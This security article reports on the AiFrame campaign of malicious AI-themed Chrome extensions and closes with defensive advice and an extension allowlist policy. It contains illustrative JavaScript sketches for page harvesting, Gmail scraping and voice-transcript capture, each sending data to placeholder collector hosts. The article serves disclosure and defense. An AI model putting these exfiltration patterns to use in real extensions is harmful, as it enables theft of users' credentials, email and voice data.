Cybercriminals are actively abusing the growing interest in AI-powered assistants and “smart” browser tools. Researchers at LayerX have disclosed a large-scale campaign, dubbed AiFrame, that leverages malicious AI Chrome extensions to steal sensitive data. At least 30 extensions in the official Chrome Web Store were linked to this operation, collectively installed by more than 300,000 users, with some remaining available even after the campaign was reported.
AiFrame campaign: centralized malicious infrastructure behind AI-themed extensions
All identified extensions in the AiFrame campaign communicate with a shared command-and-control infrastructure tied to the domain tapnetic[.]pro. This common backend is a strong indicator that these add-ons are not independent products but different “skins” for the same malicious platform designed for data exfiltration and remote control.
The most widely installed extension was Gemini AI Sidebar, which alone accumulated over 80,000 installs. According to LayerX and reports from BleepingComputer, Google has removed this particular extension, although other AiFrame-related plugins with thousands of installations each remained temporarily accessible in the Chrome Web Store.
Unified logic and remote control enable stealthy changes
The 30 malicious AI Chrome extensions share a nearly identical internal architecture, including JavaScript logic and requested permissions. Instead of implementing local AI capabilities or using legitimate APIs, they render a full-screen iframe that loads content from the remote AiFrame infrastructure.
This design allows threat actors to change extension behavior server-side without pushing an update through the Chrome Web Store. As a result, malicious features can be activated or modified dynamically, bypassing extension reviews, evading traditional detection, and making it difficult for users and security teams to notice when a once-benign tool becomes dangerous.
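To make this pattern easier to recognize, here is a minimal sketch of what such a “remote iframe” extension page can look like; the URL is a placeholder invented for illustration, not the actual AiFrame infrastructure.

```javascript
// Illustrative sketch only, not the actual AiFrame code.
// The extension page ships almost no local logic; it simply fills the viewport
// with an iframe whose content is served from attacker-controlled infrastructure.
const frame = document.createElement("iframe");
frame.src = "https://remote-panel.example/sidebar"; // placeholder for the remotely hosted UI
frame.style.cssText = "position:fixed;inset:0;width:100%;height:100%;border:none;";
document.body.appendChild(frame);

// Because all real behavior lives on the server, operators can change what this
// page does at any time without shipping a new extension version for review.
```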
How malicious AI Chrome extensions steal data and credentials
Harvesting page content with Mozilla Readability
Once installed, AiFrame extensions monitor user activity and systematically extract the content of visited web pages, including login forms, dashboards, and private workspaces. To parse and normalize page structure, the attackers abuse the Mozilla Readability library, originally designed to simplify web pages for “reader mode.”
By running Readability in the background, the extensions can reliably identify and capture usernames, passwords, session tokens, personal data, messages, and other sensitive information. This data is then transmitted to remote servers controlled by the AiFrame operators, enabling credential theft, account takeover, and further lateral movement across services where the same accounts or passwords are reused.
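The harvesting flow can be sketched roughly as follows, assuming the Readability library is bundled with the extension as LayerX describes; the collector endpoint is a placeholder invented for illustration.

```javascript
// Illustrative sketch of the page-harvesting pattern, not the actual AiFrame code.
import { Readability } from "@mozilla/readability";

function harvestPage() {
  // Readability normally powers "reader mode"; here it is used to reduce the
  // visited page to clean, structured text suitable for exfiltration.
  const article = new Readability(document.cloneNode(true)).parse();
  if (!article) return;

  fetch("https://collector.example/ingest", { // placeholder exfiltration endpoint
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({
      url: location.href,
      title: article.title,
      text: article.textContent, // captured page text sent to the remote server
    }),
  });
}
```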
Targeted Gmail data theft via content scripts
A particularly concerning element of the AiFrame campaign is its focus on Gmail data theft. At least 15 of the 30 malicious Chrome extensions contain a dedicated content script for mail.google.com. Content scripts are pieces of code that run within the context of a web page and can read or modify its Document Object Model (DOM).
In this case, the content script reads the visible text of emails directly from the DOM, continuously extracting message content via the .textContent property. This allows the malware to capture not only incoming and outgoing emails but also draft messages that the user has typed but not yet saved or sent.
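A simplified sketch of this kind of content script is shown below; the DOM selectors and the endpoint are illustrative assumptions rather than the actual AiFrame code, since the real extensions target whatever nodes Gmail currently uses to render messages and compose drafts.

```javascript
// Illustrative sketch of the Gmail content-script pattern described above.
const observer = new MutationObserver(() => {
  const captured = [];

  // Hypothetical selectors: opened messages and compose/draft editing areas.
  document.querySelectorAll("[role='listitem'], [role='textbox']").forEach((node) => {
    // .textContent returns the visible text of opened messages and unsent drafts alike.
    const text = node.textContent.trim();
    if (text) captured.push(text);
  });

  if (captured.length) {
    // Placeholder endpoint: the harvested text is shipped off to a remote server.
    navigator.sendBeacon("https://collector.example/mail", JSON.stringify(captured));
  }
});

// Re-run the extraction whenever Gmail updates the page.
observer.observe(document.body, { childList: true, subtree: true, characterData: true });
```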
When users trigger Gmail’s built-in AI features—such as automatic reply suggestions or email summarization—the extension intercepts the text and associated context before it is processed. This information is then forwarded to AiFrame’s internal logic and remote servers, effectively moving the entire email conversation outside Gmail’s native security and privacy controls.
Abuse of Web Speech API for covert voice interception
Beyond text, AiFrame’s malicious AI Chrome extensions can also misuse the Web Speech API to capture voice data. By remotely triggering speech recognition in the browser, attackers can record transcripts of voice input and exfiltrate them as plain text.
Depending on the permissions granted by the user, this could extend from capturing dictated emails and voice queries to potentially recording fragments of ambient conversations near the device. While exact impact depends on user behavior and browser permissions, this vector significantly expands the scope of possible privacy violations.
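As a rough illustration of this vector, the sketch below uses the browser’s standard SpeechRecognition interface; it only works once microphone access has been granted, and the exfiltration endpoint is a placeholder, with the trigger in practice coming from the server-controlled iframe logic described earlier.

```javascript
// Illustrative sketch of Web Speech API abuse, not the actual AiFrame code.
const SpeechRecognition = window.SpeechRecognition || window.webkitSpeechRecognition;
const recognizer = new SpeechRecognition();
recognizer.continuous = true;      // keep listening instead of stopping after one phrase
recognizer.interimResults = false; // only forward finalized transcripts

recognizer.onresult = (event) => {
  // Each result is a plain-text transcript of whatever the microphone picked up.
  const transcript = event.results[event.results.length - 1][0].transcript;
  fetch("https://collector.example/voice", { method: "POST", body: transcript }); // placeholder endpoint
};

recognizer.start(); // could be triggered remotely by the server-side logic
```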
Security impact and protection against malicious AI Chrome extensions
Installing one of these AI-themed extensions effectively grants it long-term, low-visibility access to a user’s digital life. The consequences range from credential theft and compromise of personal accounts to exposure of corporate emails, intellectual property, and confidential business negotiations. Historically, malicious browser extensions have been used to support business email compromise (BEC) and similar fraud schemes, and extensions with this level of access to email content are well suited to such attacks.
Recommended actions for users and organizations
Users who suspect they may have installed AiFrame-related or similar malicious Chrome extensions should take immediate steps to reduce risk:
1. Remove suspicious extensions from Chrome, especially those offering free AI capabilities without clear provenance or a transparent privacy policy.
2. Change passwords for all high-value accounts (email, banking, corporate services) and enable multi-factor authentication (MFA) wherever possible.
3. Review active sessions and devices in Google accounts, email services, and corporate identity platforms, terminating any unknown or outdated sessions.
4. Audit extension permissions regularly and uninstall any add-ons that request broad access such as “Read and change all your data on all websites” without a strong, justified business need.
5. For organizations, enforce an extension allowlist policy (a sample managed-policy configuration follows this list), manage browsers centrally via enterprise tools, and run user awareness training that specifically addresses the risks of “free AI” browser plugins.
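As an example of the allowlist approach mentioned in point 5, the following is a minimal sketch of a managed Chromium policy (for instance, a JSON file under /etc/opt/chrome/policies/managed/ on Linux, or the equivalent GPO/Intune setting on Windows) that blocks all extensions except explicitly approved IDs; the allowlisted ID below is a placeholder.

```json
{
  "ExtensionInstallBlocklist": ["*"],
  "ExtensionInstallAllowlist": [
    "aaaabbbbccccddddeeeeffffgggghhhh"
  ]
}
```

With this policy in place, users can only install extensions that have been reviewed and approved by the organization, which closes the door on opportunistic installs of unvetted “free AI” add-ons.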
As the AiFrame campaign demonstrates, even the official Chrome Web Store cannot be treated as a guaranteed safe environment. Sustainable protection requires a combination of technical controls, cautious installation practices, regular reviews of installed extensions, strong password hygiene, and consistent use of multi-factor authentication. Treat any “AI assistant” extension—especially those promising powerful features at no cost and with extensive permissions—as a potential entry point for data theft, and verify its developer, reputation, and privacy posture before granting it access to your browser and your most sensitive information.